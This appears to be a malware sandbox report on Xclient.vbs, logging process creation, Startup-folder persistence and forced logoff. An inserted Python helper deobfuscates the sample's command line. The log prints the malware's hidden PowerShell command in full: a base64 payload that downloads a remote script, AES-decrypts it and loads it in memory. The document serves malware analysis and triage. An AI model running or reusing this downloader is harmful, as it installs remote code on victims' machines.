                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
                Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs"
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Xclient.vbs | Virustotal: Detection: 8%
                Source: Xclient.vbs | ReversingLabs: Detection: 27%
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
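The powershell.exe command line above hands the interpreter one base64 string. Decoding it shows a script that hides its own text with junk tokens removed at run time by .Replace('MICROSOFTSERVICEUPDATES','') and .Replace('ABC',''), and that spells a System.IO.File member backwards ('txeTllAdaeR'[-1..-11] -join ''), around an iwr download, an AES-CBC/PKCS7 TransformFinalBlock routine, a GZip decompress and a Reflection.Assembly Load followed by EntryPoint.Invoke. The Python below is an added triage helper, not part of the Joe Sandbox report or of the malware: it peels that layer, reverses both obfuscation tricks and pulls out the URL, key and IV. Its sample command line is constructed here with the same layering but a placeholder URL (example.invalid), a placeholder key and IV, and made-up function names; none of those are indicators from this analysis.

```python
"""Peel a powershell.exe command line of the shape seen in this report: decode
the [Convert]::FromBase64String('...') argument, strip junk-token
.Replace('TOKEN','') obfuscation, undo reversed member names such as
'txeTllAdaeR'[-1..-11] -join '' and extract URL, AES key/IV and loader calls."""
import base64
import re

# Constructed stand-in for the real command line: same layering and the same
# obfuscation tricks, but the URL, key and IV are placeholders built here so the
# example runs offline and carries no real indicator.
PLACEHOLDER_KEY = base64.b64encode(bytes(range(32))).decode()
PLACEHOLDER_IV = base64.b64encode(bytes(range(16))).decode()
INNER_SCRIPT = (
    "iex ((iex (('iJUNKwr -JUNKUseBasicParsing \"hJUNKtJUNKtps://example.invalid/stage2.ps1\"')"
    ".Replace('JUNK',''))).Content);"
    "function kdaut($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();"
    "$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;"
    "$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;"
    f"$aes_var.Key=[System.Convert]::FromBase64String('{PLACEHOLDER_KEY}');"
    f"$aes_var.IV=[System.Convert]::FromBase64String('{PLACEHOLDER_IV}');"
    "$decryptor_var=$aes_var.CreateDecryptor();"
    "$return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);$return_var;}"
    "function zgwww($param_var,$param2_var){"
    "IEX '$byawh=[System.RABCeABCflABCectABCion.ABCAsABCseABCmbABClABCyABC]::LABCoABCaABCdABC([byte[]]$param_var);'.Replace('ABC', '');"
    "IEX '$eaass=$byawh.ABCEABCnABCtABCrABCyABCPABCoABCiABCnABCtABC;'.Replace('ABC', '');"
    "IEX '$eaass.ABCIABCnABCvABCoABCkABCeABC($null, $param2_var);'.Replace('ABC', '');}"
    "$pgvwl='C:\\Users\\' + $env:USERNAME + 'ABC\\ABCdABCwABCmABC.ABCbABCaABCtABC'.Replace('ABC', '');"
    "$cmtkt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pgvwl);"
)
SAMPLE_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile '
    '-windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString('
    "[Convert]::FromBase64String('" + base64.b64encode(INNER_SCRIPT.encode()).decode() + "'))\""
)


def extract_outer_b64(cmdline):
    """Base64 argument of FromBase64String('...'); the closing quote is not
    required so a truncated sandbox capture still yields the partial blob."""
    m = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)", cmdline)
    return m.group(1) if m else None


def b64_decode_lenient(blob):
    """Decode base64 that may have been cut mid-quad by log truncation."""
    blob = blob.rstrip("=")
    if len(blob) % 4 == 1:          # a lone trailing sextet cannot form a byte
        blob = blob[:-1]
    return base64.b64decode(blob + "=" * (-len(blob) % 4))


def strip_junk_tokens(script):
    """Remove every token the script deletes itself via .Replace('TOKEN','')."""
    tokens = set(re.findall(r"\.Replace\('([^']+)',\s*''\)", script))
    for tok in sorted(tokens, key=len, reverse=True):
        script = script.replace(tok, "")
    return re.sub(r"\.Replace\('',\s*''\)", "", script)   # now-empty calls


def unreverse_member_names(script):
    """::('txeTllAdaeR'[-1..-11] -join '') is ::ReadAllText spelled backwards."""
    return re.sub(r"::\('([^']+)'\[-1\.\.-\d+\]\s*-join\s*''\)",
                  lambda m: "::" + m.group(1)[::-1], script)


def deobfuscate(cmdline):
    blob = extract_outer_b64(cmdline)
    if blob is None:
        raise ValueError("no FromBase64String('...') argument in command line")
    script = b64_decode_lenient(blob).decode("utf-8", errors="replace")
    return unreverse_member_names(strip_junk_tokens(script))


def extract_iocs(script):
    """Pull the pieces an analyst wants first: URLs, AES key/IV, loader calls."""
    b64_arg = r"\[System\.Convert\]::FromBase64String\('([^']+)'\)"
    key = re.search(r"\.Key\s*=\s*" + b64_arg, script)
    iv = re.search(r"\.IV\s*=\s*" + b64_arg, script)
    return {
        "urls": re.findall(r"https?://[^\s'\"\)]+", script),
        "aes_key_b64": key.group(1) if key else None,
        "aes_iv_b64": iv.group(1) if iv else None,
        "loads_assembly": "Reflection.Assembly]::Load" in script,
        "file_calls": re.findall(r"\[System\.IO\.File\]::(\w+)", script),
    }


if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE_CMDLINE)
    print(cleaned)
    print(extract_iocs(cleaned))
```

Run it against the real command line by passing the full string to deobfuscate(); the decoder tolerates the truncated tail seen in the last entry of this section, but any token whose .Replace() call fell past the cut is left in place.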
                Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd" "
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe shutdown.exe -L
                Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x4 /state0:0xa3f5c055 /state1:0x41c64e6d
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknown Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
                Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f66055 /state1:0x41c64e6d
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f76055 /state1:0x41c64e6d
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\dwm.exe "dwm.exe"
                Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f7d855 /state1:0x41c64e6d
                Source: unknown Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
                Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f05055 /state1:0x41c64e6d
                Source: unknown Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
                Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f0c855 /state1:0x41c64e6d
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe shutdown.exe -L
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
